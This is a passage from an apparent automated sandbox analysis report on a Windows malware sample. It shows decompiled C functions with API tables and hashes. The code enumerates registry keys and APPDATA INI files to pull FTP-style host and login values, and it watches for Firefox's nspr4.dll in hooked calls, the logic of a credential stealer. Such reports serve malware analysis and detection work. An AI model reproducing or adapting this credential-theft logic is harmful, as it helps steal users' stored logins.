							RegCloseKey(_v8);
							goto L20;
						} else {
							goto L4;
						}
						L17:
						_v20 = 0x104;
						if(RegEnumKeyExW(_v8, _v24,  &_v780,  &_v20, 0, 0, 0, 0) == 0) {
							L4:
							_t122 = _v16;
							_v24 = _v24 + 1;
							_t92 = E004102E6(_v8, _t118, _v16,  &_v780,  &_v88, 0xff);
							_v40 = _t92;
							if(_t92 != 0xffffffff && _t92 != 0) {
								_t132 = E004102E6(_v8, _t118, _t122 + 0x1fe,  &_v780,  &_v68, 0xff);
								if(_t132 != 0xffffffff && _t132 != 0) {
									_t124 = _v36;
									_t104 = E004102E6(_v8, _t118, _v36,  &_v780,  &_v108, 0xff);
									_v20 = _t104;
									if(_t104 != 0xffffffff && _t104 != 0 && E00419866(_t119, _t124, _t132 + _v40) > 0) {
										_t125 = E0041039C(_v8, _t118,  &_v780,  &_v132);
										if(_t125 < 1 || _t125 > 0xffff) {
											_t125 = 0x15;
										}
										_t134 =  &_v172;
										_t110 = 0x55;
										E004128DB(_t110,  &_v172);
										_t112 = _v16;
										_t118 = _v36;
										_push(_t125);
										_push(_t112);
										_push(_t118);
										_push(_t112 + 0x1fe);
										_t119 = 0x311;
										_t126 = _t118 + 0x1fe;
										_t115 = E0040CEB5(_t134, 0x311, _t118 + 0x1fe, _t134);
										_t136 = _t136 + 0x14;
										if(_t115 > 0) {
											_t118 =  &_v32;
											if(E0040C5B6(_t115,  &_v32, _t126) != 0) {
												_v28 = _v28 + 1;
											}
										}
									}
								}
							}
							goto L17;
						} else {
							_t120 = 0;
							goto L19;
						}
						L20:
						_v12 = _v12 + 1;
					} while (_v12 < 2);
					E0040C1C2(_v16);
					goto L22;
				}
			}

0x00419920
0x00419920
0x0041992e
0x00419935
0x0041993f
0x00419944
0x00419949
0x00419b42
0x00419b45
0x00000000
0x00419b5e
0x00000000
0x0041994f
0x00419954
0x00419962
0x00419969
0x00419970
0x0041997d
0x0041998a
0x00419997
0x004199a4
0x004199a9
0x004199b1
0x004199ce
0x00000000
0x00000000
0x004199e7
0x004199ea
0x004199f9
0x00419b24
0x00419b27
0x00000000
0x00000000
0x00000000
0x00000000
0x00419af6
0x00419b0a
0x00419b1c
0x004199ff
0x004199ff
0x00419a02
0x00419a14
0x00419a19
0x00419a1f
0x00419a47
0x00419a4c
0x00419a5a
0x00419a6c
0x00419a71
0x00419a77
0x00419a9d
0x00419aa2
0x00419aae
0x00419aae
0x00419ab1
0x00419ab7
0x00419ab8
0x00419abd
0x00419ac0
0x00419ac3
0x00419ac4
0x00419ac5
0x00419acb
0x00419acf
0x00419ad4
0x00419ada
0x00419adf
0x00419ae4
0x00419ae7
0x00419af1
0x00419af3
0x00419af3
0x00419af1
0x00419ae4
0x00419a77
0x00419a4c
0x00000000
0x00419b22
0x00419b22
0x00000000
0x00419b22
0x00419b2d
0x00419b2d
0x00419b30
0x00419b3d
0x00000000
0x00419b3d

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008,?,00000000,00000001), ref: 004199C6
RegEnumKeyExW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000001), ref: 004199F1
RegCloseKey.ADVAPI32(?,?,00000000,00000001), ref: 00419B27

Part of subcall function 004102E6: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,004174C9,?,?,00000104,.exe,00000000), ref: 004102FB

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF,?,00000000,00000001), ref: 00419B14

Part of subcall function 004102E6: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,004174C9,?,?,00000104), ref: 0041037C

Part of subcall function 0041039C: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,0041C4D7,?,?), ref: 004103B4

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Open$Enum$CloseEnvironmentExpandStrings
String ID:
API String ID: 2343474859-0
Opcode ID: 4845545987d5e0baa56cbb90ff87f11b664b7fac93f339b0d40e388de2469a0c
Instruction ID: ef2fa044a2620454df6a460e9bbcfa83b5a2bdf68600020c52b3c584dfe045b9
Opcode Fuzzy Hash: 4845545987d5e0baa56cbb90ff87f11b664b7fac93f339b0d40e388de2469a0c
Instruction Fuzzy Hash: B5516E72D00118ABDB10EBE5CD85AEFB7BCEF48344F10016AE905F3291DB789E858B64

Uniqueness

Uniqueness Score: -1.00%

Function 00419EB4, Relevance: 6.2, APIs: 4, Instructions: 176
registryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00419EB4(char* __ecx, void* __eflags) {
				void* _v8;
				int _v12;
				intOrPtr _v16;
				int* _v20;
				intOrPtr _v24;
				char _v28;
				char* _v32;
				char _v40;
				char _v52;
				char _v64;
				char _v76;
				char _v116;
				short _v180;
				short _v700;
				void* __edi;
				void* __esi;
				intOrPtr _t55;
				int _t81;
				int _t89;
				int _t93;
				void* _t99;
				intOrPtr _t101;
				void* _t104;
				int* _t109;
				char* _t113;
				void* _t114;
				void* _t122;

				_t107 = __ecx;
				_t109 = 0;
				E0040C275( &_v28,  &_v28, 0, 8);
				_t55 = E0040C192(0xc1c);
				_v16 = _t55;
				if(_t55 == 0) {
					return _t55;
				}
				_v32 = _t55 + 0x3fc;
				E004128DB(0x97,  &_v180);
				E004128DB(0x98,  &_v64);
				E004128DB(0x99,  &_v76);
				E004128DB(0x9a,  &_v52);
				E004128DB(0x9b,  &_v40);
				if(RegOpenKeyExW(0x80000001,  &_v180, 0, 8,  &_v8) != 0) {
					L20:
					E0040C1C2(_v16);
					if(_v24 <= _t109) {
						return E0040C1C2(_v28);
					}
					return E00417504(0x311, _v28, 0xcb);
				}
				_v20 = 0;
				_v12 = 0x104;
				if(RegEnumKeyExW(_v8, 0,  &_v700,  &_v12, 0, 0, 0, 0) != 0) {
					L19:
					RegCloseKey(_v8);
					goto L20;
				} else {
					do {
						_t111 = _v16;
						_v20 = _v20 + 1;
						_t81 = E004102E6(_v8, _t107, _v16,  &_v700,  &_v64, 0xff);
						_v12 = _t81;
						if(_t81 != 0xffffffff && _t81 != 0) {
							_t89 = E004102E6(_v8, _t107, _t111 + 0x1fe,  &_v700,  &_v52, 0xff);
							_v12 = _t89;
							if(_t89 != 0xffffffff && _t89 != 0) {
								_t113 = _v32;
								_t93 = E004102E6(_v8, _t107, _t113,  &_v700,  &_v40, 0xff);
								_v12 = _t93;
								if(_t93 != 0xffffffff && _t93 != 0) {
									_t107 = _t113;
									if(E0040CD11(_t113) > 0) {
										_t114 = E0041039C(_v8, _t107,  &_v700,  &_v76);
										if(_t114 < 1 || _t114 > 0xffff) {
											_t114 = 0x15;
										}
										_t121 =  &_v116;
										_t99 = 0x55;
										E004128DB(_t99,  &_v116);
										_t101 = _v16;
										_t107 = _v32;
										_push(_t114);
										_push(_t101);
										_push(_t107);
										_push(_t101 + 0x1fe);
										_t115 = _t107 + 0x1fe;
										_t104 = E0040CEB5(_t121, 0x311, _t107 + 0x1fe, _t121);
										_t122 = _t122 + 0x14;
										if(_t104 > 0) {
											_t107 =  &_v28;
											if(E0040C5B6(_t104,  &_v28, _t115) != 0) {
												_v24 = _v24 + 1;
											}
										}
									}
								}
							}
						}
						_v12 = 0x104;
					} while (RegEnumKeyExW(_v8, _v20,  &_v700,  &_v12, 0, 0, 0, 0) == 0);
					_t109 = 0;
					goto L19;
				}
			}

0x00419eb4
0x00419ec2
0x00419ec9
0x00419ed3
0x00419ed8
0x00419edd
0x0041a0d7
0x0041a0d7
0x00419ee8
0x00419ef6
0x00419f03
0x00419f10
0x00419f1d
0x00419f2a
0x00419f4a
0x0041a0aa
0x0041a0ad
0x0041a0b5
0x00000000
0x0041a0ce
0x00000000
0x0041a0c4
0x00419f63
0x00419f66
0x00419f75
0x0041a0a1
0x0041a0a4
0x00000000
0x00419f7b
0x00419f80
0x00419f80
0x00419f83
0x00419f95
0x00419f9a
0x00419fa0
0x00419fc3
0x00419fc8
0x00419fce
0x00419fdc
0x00419fee
0x00419ff3
0x00419ff9
0x00419fff
0x0041a008
0x0041a01d
0x0041a022
0x0041a02e
0x0041a02e
0x0041a031
0x0041a034
0x0041a035
0x0041a03a
0x0041a03d
0x0041a040
0x0041a041
0x0041a042
0x0041a048
0x0041a051
0x0041a057
0x0041a05c
0x0041a061
0x0041a064
0x0041a06e
0x0041a070
0x0041a070
0x0041a06e
0x0041a061
0x0041a008
0x00419ff9
0x00419fce
0x0041a087
0x0041a097
0x0041a09f
0x00000000
0x0041a09f

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,00000008,?,?,00000000,00000008,?,00000000,00000001), ref: 00419F42
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,00000001), ref: 00419F6D
RegCloseKey.ADVAPI32(?,?,00000000,00000001), ref: 0041A0A4

Part of subcall function 004102E6: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,004174C9,?,?,00000104,.exe,00000000), ref: 004102FB

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF,?,00000000,00000001), ref: 0041A091

Part of subcall function 004102E6: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,004174C9,?,?,00000104), ref: 0041037C

Part of subcall function 0041039C: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,0041C4D7,?,?), ref: 004103B4

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Open$Enum$CloseEnvironmentExpandStrings
String ID:
API String ID: 2343474859-0
Opcode ID: 805b4e63e350209c1db1db539d2733eeb2523081abf0c9f6d662c3df14396207
Instruction ID: eff8ac6721701ccf3497b70151afb963879ec6b4e3cb6007f39cf6e9598aacda
Opcode Fuzzy Hash: 805b4e63e350209c1db1db539d2733eeb2523081abf0c9f6d662c3df14396207
Instruction Fuzzy Hash: DB511F72900108ABEB20ABE5CD85AEFBBBDEB48304F140166F505F3291D7389A958B65

Uniqueness

Uniqueness Score: -1.00%

Function 00404CE2, Relevance: 6.1, APIs: 4, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00404CE2(void* __eflags, intOrPtr _a4) {
				signed int _v5;
				short _v20;
				char _v40;
				char _v60;
				short _v84;
				char _v112;
				char _v144;
				short _v664;
				char _v1184;
				short _v1704;
				char _v2224;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t31;
				long _t33;
				void* _t36;
				void* _t42;
				void* _t44;
				void* _t46;
				long _t50;
				short* _t58;
				char* _t65;
				short _t66;
				void* _t67;
				WCHAR* _t70;
				long _t77;

				_t31 = 0x2a;
				E004128DB(_t31,  &_v144);
				_t33 =  &_v1184;
				__imp__SHGetFolderPathW(0, 0x1a, 0, 0, _t33);
				if(_t33 == 0) {
					_t33 = E00411A47( &_v144,  &_v1184,  &_v1184);
					if(_t33 != 0) {
						_t36 = 0x2c;
						E004128DB(_t36,  &_v112);
						_t33 = E00411A47( &_v112,  &_v1704,  &_v1184);
						if(_t33 != 0) {
							_t33 = GetFileAttributesW( &_v1704);
							if(_t33 != 0xffffffff) {
								_t42 = 0x2d;
								E004128DB(_t42,  &_v60);
								_t44 = 0x2e;
								E004128DB(_t44,  &_v84);
								_t46 = 0x2f;
								E004128DB(_t46,  &_v20);
								_v5 = 0;
								while(1) {
									_push(_v5 & 0x000000ff);
									_push( &_v60);
									_t67 = 0xa;
									_t70 =  &_v40;
									_t50 = E0040CEB5( &_v60, _t67, _t70);
									if(_t50 < 1) {
										break;
									}
									_t50 = GetPrivateProfileIntW(_t70,  &_v84, 0xffffffff,  &_v1704);
									_t77 = _t50;
									if(_t77 == 0xffffffff) {
										break;
									}
									_t50 = GetPrivateProfileStringW(_t70,  &_v20, 0,  &_v664, 0x104,  &_v1704);
									if(_t50 == 0) {
										L17:
										_v5 = _v5 + 1;
										if(_v5 < 0xfa) {
											continue;
										}
										break;
									}
									_t58 =  &_v664;
									if(_v664 == 0) {
										L12:
										if(_t77 != 1) {
											_t65 =  &_v664;
											L16:
											_t50 = E00404E69(0, _t65, _a4, _t90);
											if(_t50 == 0) {
												break;
											}
											goto L17;
										}
										_t50 = E00411A47( &_v664,  &_v2224,  &_v1184);
										_t90 = _t50;
										if(_t50 == 0) {
											goto L17;
										}
										_t65 =  &_v2224;
										goto L16;
									} else {
										goto L9;
									}
									do {
										L9:
										if( *_t58 == 0x2f) {
											_t66 = 0x5c;
											 *_t58 = _t66;
										}
										_t58 = _t58 + 2;
									} while ( *_t58 != 0);
									goto L12;
								}
								return _t50;
							}
						}
					}
				}
				return _t33;
			}

0x00404cf5
0x00404cf6
0x00404cfb
0x00404d09
0x00404d11
0x00404d21
0x00404d28
0x00404d33
0x00404d34
0x00404d49
0x00404d50
0x00404d5d
0x00404d66
0x00404d71
0x00404d72
0x00404d7c
0x00404d7d
0x00404d87
0x00404d88
0x00404d8d
0x00404d91
0x00404d95
0x00404d99
0x00404d9c
0x00404d9d
0x00404da0
0x00404daa
0x00000000
0x00000000
0x00404dc0
0x00404dc6
0x00404dcb
0x00000000
0x00000000
0x00404dec
0x00404df4
0x00404e55
0x00404e55
0x00404e5c
0x00000000
0x00000000
0x00000000
0x00404e5c
0x00404df6
0x00404e03
0x00404e19
0x00404e1c
0x00404e43
0x00404e49
0x00404e4c
0x00404e53
0x00000000
0x00000000
0x00000000
0x00404e53
0x00404e32
0x00404e37
0x00404e39
0x00000000
0x00000000
0x00404e3b
0x00000000
0x00000000
0x00000000
0x00000000
0x00404e05
0x00404e05
0x00404e09
0x00404e0d
0x00404e0e
0x00404e0e
0x00404e11
0x00404e14
0x00000000
0x00404e05
0x00000000
0x00404e62
0x00404d66
0x00404d50
0x00404d28
0x00404e66

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000000), ref: 00404D09

Part of subcall function 00411A47: PathCombineW.SHLWAPI(00412BBC,00412BBC,?,00412BBC,?,?), ref: 00411A66

GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 00404D5D
GetPrivateProfileIntW.KERNEL32 ref: 00404DC0
GetPrivateProfileStringW.KERNEL32 ref: 00404DEC

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: PathPrivateProfile$AttributesCombineFileFolderString
String ID:
API String ID: 1702184609-0
Opcode ID: 48df2ede0ccee2610d077ad7ed275d9e407c8fc57fa9cfad85f99e9e5c887f17
Instruction ID: 2eb1ec381ca5b5d3fe046f8f66d1e3769d0e0abcf35a64cbbc00f55f96f00cb9
Opcode Fuzzy Hash: 48df2ede0ccee2610d077ad7ed275d9e407c8fc57fa9cfad85f99e9e5c887f17
Instruction Fuzzy Hash: 66419DB2900218AADF10EAA4CD85ADB777CAB85354F0001A7F614F71D1D7749E898B98

Uniqueness

Uniqueness Score: -1.00%

Function 00412655, Relevance: 6.1, APIs: 4, Instructions: 86comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004015B0,00000000,00004401,004015A0,?), ref: 0041267B
#8.OLEAUT32(?), ref: 004126C7
#2.WS2_32(?), ref: 004126D7
#9.OLEAUT32(?), ref: 00412710

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 825154fbe07c9436ff7aca48b55201353bca4e2e0da95a753cfabf15d89ce18c
Instruction ID: 7f1a1467a4451a704ff3fd5875912cb7084ff34774e09a2e1ee7c25f57436fa8
Opcode Fuzzy Hash: 825154fbe07c9436ff7aca48b55201353bca4e2e0da95a753cfabf15d89ce18c
Instruction Fuzzy Hash: 05218070900224AFCB11DBA4CDC8EEF7BB8EF09750F0405A6F916EB291D7B59944CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00412179, Relevance: 6.1, APIs: 4, Instructions: 84
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00412179(signed int __edx, void** __esi, void* _a4, signed int _a8) {
				char _v5;
				long _v12;
				void _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _t26;
				signed int _t29;
				signed int _t46;
				void** _t48;

				_t48 = __esi;
				_t46 = __edx;
				_v5 = 0;
				if(_a8 <= 0xa00000) {
					_t26 = E004114C6( *__esi);
					_v36 = _t26;
					_v32 = _t46;
					if((_t26 & _t46) != 0xffffffff && E004114A6( *__esi, 0, 0, 2) != 0) {
						_t29 = E004114C6( *__esi);
						_v28 = _t29;
						_v24 = _t46;
						if((_t29 & _t46) != 0xffffffff) {
							E0040C275( &_v20,  &_v20, 0, 5);
							_v20 = __esi[4] ^ _a8;
							if(WriteFile( *__esi,  &_v20, 5,  &_v12, 0) == 0 || _v12 != 5 || WriteFile( *__esi, _a4, _a8,  &_v12, 0) == 0 || _v12 != _a8) {
								E004114A6( *_t48, _v28, _v24, 0);
								SetEndOfFile( *_t48);
							} else {
								_v5 = 1;
							}
						}
						FlushFileBuffers( *_t48);
						E004114A6( *_t48, _v36, _v32, 0);
					}
				}
				return _v5;
			}

0x00412179
0x00412179
0x0041218a
0x0041218d
0x00412195
0x0041219a
0x0041219f
0x004121a5
0x004121c0
0x004121c5
0x004121ca
0x004121d0
0x004121d9
0x004121eb
0x004121fe
0x00412230
0x00412237
0x00412221
0x00412221
0x00412221
0x004121fe
0x0041223f
0x0041224e
0x0041224e
0x004121a5
0x00412259

APIs

Part of subcall function 004114C6: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,?,00000000,00000000), ref: 004114DB

Part of subcall function 004114A6: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00412152,?,00000000,00000000,00000000,00000000), ref: 004114B8

WriteFile.KERNEL32(?,?,00000005,00000000,00000000,?,00000000,00000005,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 004121FA
WriteFile.KERNEL32(?,00000005,00A00000,00000005,00000000), ref: 00412213
SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 00412237
FlushFileBuffers.KERNEL32(?,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 0041223F

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: File$PointerWrite$BuffersFlush
String ID:
API String ID: 1289656144-0
Opcode ID: 01c7e41dfe092421394b7ca12780850e3ded4af82079477d2a483c7668920bb9
Instruction ID: 454e175e791e213352fef1a7572d9edf7f3ee0974e81cd1a9424a54dd0ebadc0
Opcode Fuzzy Hash: 01c7e41dfe092421394b7ca12780850e3ded4af82079477d2a483c7668920bb9
Instruction Fuzzy Hash: 70315C76800109EFDF119FE4DD41EEEBBB9AF48358F10856AF250A1160D37A8AA5DB24

Uniqueness

Uniqueness Score: -1.00%

Function 0040AB15, Relevance: 6.1, APIs: 4, Instructions: 69
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AB15(void* __ebx, void* __ecx) {
				char _v20;
				char* _v84;
				char _v92;
				char _v196;
				char _v716;
				void* __edi;
				void* __esi;
				void* _t15;
				void* _t31;
				void* _t35;
				void* _t36;
				char _t37;
				void** _t43;

				_t36 = __ecx;
				_t35 = __ebx;
				_t15 =  *(__ebx + 0x180);
				if(_t15 == 0 || WaitForSingleObject(_t15, 0) != 0x102) {
					_t43 = _t35 + 0x17c;
					E0040DBD1(_t43);
					E0041349C(_t36,  &_v716, 1);
					E00413140(0x2937498d,  &_v196, 0);
					_t37 = 0x44;
					E0040C275( &_v92,  &_v92, 0, _t37);
					_v92 = _t37;
					_v84 =  &_v196;
					ResetEvent( *(_t35 + 0xc));
					if(E0040DA89( &_v716, 0x4017b8, 0,  &_v92,  &_v20) != 0) {
						E0040C1FE(_t43,  &_v20, 0x10);
						if(WaitForSingleObject( *(_t35 + 0xc), 0x3e8) == 0) {
							goto L6;
						} else {
							TerminateProcess( *_t43, 0);
							E0040DBD1(_t43);
							goto L3;
						}
					} else {
						L3:
						_t31 = 0;
					}
				} else {
					L6:
					_t31 = 1;
				}
				return _t31;
			}

0x0040ab15
0x0040ab15
0x0040ab18
0x0040ab28
0x0040ab3e
0x0040ab44
0x0040ab51
0x0040ab65
0x0040ab6c
0x0040ab73
0x0040ab81
0x0040ab84
0x0040ab87
0x0040aba9
0x0040abb6
0x0040abcb
0x00000000
0x0040abcd
0x0040abd0
0x0040abd6
0x00000000
0x0040abd6
0x0040abab
0x0040abab
0x0040abab
0x0040abab
0x0040abdd
0x0040abdd
0x0040abdd
0x0040abdd
0x0040abe2

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 0040AB2D
ResetEvent.KERNEL32(?,?,00000000,00000044,2937498D,?,00000000,00000001), ref: 0040AB87
WaitForSingleObject.KERNEL32(?,000003E8,?,?,00000010,?,004017B8,00000000,?,?), ref: 0040ABC3
TerminateProcess.KERNEL32(?,00000000), ref: 0040ABD0

Part of subcall function 0040DBD1: CloseHandle.KERNEL32(?,0001FEE6,00416AB0,00000000,00423E80,00000000,00416BE5,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040DBE0
Part of subcall function 0040DBD1: CloseHandle.KERNEL32(?,0001FEE6,00416AB0,00000000,00423E80,00000000,00416BE5,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040DBE9

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CloseHandleObjectSingleWait$EventProcessResetTerminate
String ID:
API String ID: 401097067-0
Opcode ID: e224464e566f025fdcb3655e124393a0ebc3103a03e07e64571a0e30eef9dac9
Instruction ID: 35075be0d4c8d2b6e39a3b8b18d8cba90e43fbdabfa54f6fb1705909fe8a0c4a
Opcode Fuzzy Hash: e224464e566f025fdcb3655e124393a0ebc3103a03e07e64571a0e30eef9dac9
Instruction Fuzzy Hash: E3117571900309AADF10ABA5DC89FEF777DEF44704F00057AF905F60A5E638A945DB29

Uniqueness

Uniqueness Score: -1.00%

Function 00414633, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 61
stringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00414633(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				void* __edi;
				void* _t12;
				intOrPtr _t13;
				void* _t16;
				void* _t17;
				void* _t21;
				void* _t22;
				void* _t23;
				intOrPtr _t24;
				void* _t28;
				intOrPtr* _t29;
				intOrPtr _t31;

				if(E004132A1() != 0) {
					_t29 = _a16;
					_t24 = _a12;
					_t12 =  *0x4238d4(_a4, 0, _t24, _t29, _t23, _t28, _t17);
					_t13 =  *0x4238d0(_a4, _a8, _t24, _t29);
					_a4 = _t13;
					if(_t12 < 0 && _t13 >= 0 && _t29 != 0 &&  *_t29 != 0 && _t24 != 0) {
						EnterCriticalSection(0x423dd4);
						if(( *0x423dec & 0x00000001) == 0) {
							_t31 =  *_t29;
							if(lstrcmpiW( *(_t24 + 4), L"nspr4.dll") != 0) {
								_t16 = 0;
							} else {
								_t16 = E0041D672(_t21, _t22, _t31);
							}
							if(_t16 != 0) {
								 *0x423dec =  *0x423dec | 0x00000001;
							}
						}
						LeaveCriticalSection(0x423dd4);
					}
					return _a4;
				}
				goto ( *0x4238d0);
			}

0x0041463d
0x00414648
0x0041464c
0x00414656
0x00414666
0x0041466c
0x00414671
0x0041468a
0x00414697
0x0041469c
0x004146ac
0x004146b7
0x004146ae
0x004146b0
0x004146b0
0x004146bb
0x004146bd
0x004146bd
0x004146bb
0x004146c5
0x004146c5
0x004146d2
0x004146d2
0x00414640

APIs

Part of subcall function 004132A1: WaitForSingleObject.KERNEL32(00000000,00407D52,00000310,00000000,00000310,909011A5,00000002), ref: 004132A9

EnterCriticalSection.KERNEL32(00423DD4), ref: 0041468A
lstrcmpiW.KERNEL32(?,nspr4.dll), ref: 004146A4
LeaveCriticalSection.KERNEL32(00423DD4), ref: 004146C5

Strings

nspr4.dll, xrefs: 0041469E

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeaveObjectSingleWaitlstrcmpi
String ID: nspr4.dll
API String ID: 3081114022-741017701
Opcode ID: d19470e1ff7c0ca9fa0abe7322e3bb5966c380076100c5bacfd6d74cb8a4c9be
Instruction ID: ce00e6e431a2fa2cb08a3204435a842d2cad010c15c085ededd1e12562ff0545
Opcode Fuzzy Hash: d19470e1ff7c0ca9fa0abe7322e3bb5966c380076100c5bacfd6d74cb8a4c9be
Instruction Fuzzy Hash: 90118F31300215ABCB21AF21ED44BD77BB8EB86759F04402AFC05A7261D73DA982DB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040F92F, Relevance: 6.0, APIs: 4, Instructions: 42
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F92F(HANDLE* _a4) {
				struct tagMSG _v28;
				long _t16;

				while(1) {
					_t16 = MsgWaitForMultipleObjects(1, _a4, 0, 0xffffffff, 0x4ff);
					if(_t16 != 1) {
						break;
					}
					while(PeekMessageW( &_v28, 0, 0, 0, 1) != 0) {
						if(_v28.message != 0x12) {
							TranslateMessage( &_v28);
							DispatchMessageW( &_v28);
							continue;
						}
						goto L5;
					}
				}
				L5:
				return _t16;
			}

0x0040f976
0x0040f982
0x0040f987
0x00000000
0x00000000
0x0040f962
0x0040f94a
0x0040f951
0x0040f95c
0x00000000
0x0040f95c
0x00000000
0x0040f94a
0x0040f962
0x0040f98a
0x0040f992

APIs

PeekMessageW.USER32 ref: 0040F96C
MsgWaitForMultipleObjects.USER32 ref: 0040F980

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: MessageMultipleObjectsPeekWait
String ID:
API String ID: 3986374578-0
Opcode ID: cd971c133abe50a50af2c82c45dc09d100e148dcef08147592c73ff6ce74fdaa
Instruction ID: 23f8183d60ef3ae744df45370f2e113eb589f0b7b49e26db241ecbf190a487e7
Opcode Fuzzy Hash: cd971c133abe50a50af2c82c45dc09d100e148dcef08147592c73ff6ce74fdaa
Instruction Fuzzy Hash: CAF0F6721043097BD720ABA9DD48EA7BBACEB457A4F050536FA00F31B0D276980886B5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A945, Relevance: 6.0, APIs: 4, Instructions: 40
threadsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A945(void* __eflags) {
				void* _t1;
				void* _t2;
				long _t6;
				void* _t12;

				_t1 = E0041317B(_t12, __eflags, 0x19367401, 1);
				_t19 = _t1;
				if(_t1 != 0) {
					_t2 = E004132A1();
					__eflags = _t2;
					if(_t2 == 0) {
						L7:
						E0040F995(_t19);
						__eflags = 0;
						return 0;
					}
					SetThreadPriority(GetCurrentThread(), 0xfffffff1);
					_t6 = WaitForSingleObject( *0x423d64, 0x1388);
					while(1) {
						__eflags = _t6 - 0x102;
						if(_t6 != 0x102) {
							break;
						}
						E0041D76E();
						_t6 = WaitForSingleObject( *0x423d64, 0x1388);
					}
					goto L7;
				}
				return _t1 + 1;
			}

0x0041a94d
0x0041a952
0x0041a956
0x0041a95b
0x0041a960
0x0041a962
0x0041a9a6
0x0041a9a7
0x0041a9ac
0x00000000
0x0041a9ac
0x0041a970
0x0041a988
0x0041a99f
0x0041a99f
0x0041a9a1
0x00000000
0x00000000
0x0041a991
0x0041a99d
0x0041a99d
0x00000000
0x0041a9a5
0x00000000

APIs

Part of subcall function 0041317B: CreateMutexW.KERNEL32(004238D8,00000000,?,?,?,?,?), ref: 0041319C

GetCurrentThread.KERNEL32 ref: 0041A969
SetThreadPriority.KERNEL32(00000000,?,?,?,19367401,00000001), ref: 0041A970
WaitForSingleObject.KERNEL32(00001388,?,?,?,19367401,00000001), ref: 0041A988

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Thread$CreateCurrentMutexObjectPrioritySingleWait
String ID:
API String ID: 3441234504-0
Opcode ID: 41e7cdec3676510d54d0425389f331f6ca7fa78b0f8602894d3aa2f2e6f5c0a1
Instruction ID: 48b2b1acd8c57d0a9d177a85a32fa635832d873c69e7d770c1b8f1f1463506ad
Opcode Fuzzy Hash: 41e7cdec3676510d54d0425389f331f6ca7fa78b0f8602894d3aa2f2e6f5c0a1
Instruction Fuzzy Hash: 11F059F22143083AD6227BA5AD45EDB3A1DC7403A9B210437F511A21B2D5294CD246BE

Uniqueness

Uniqueness Score: -1.00%

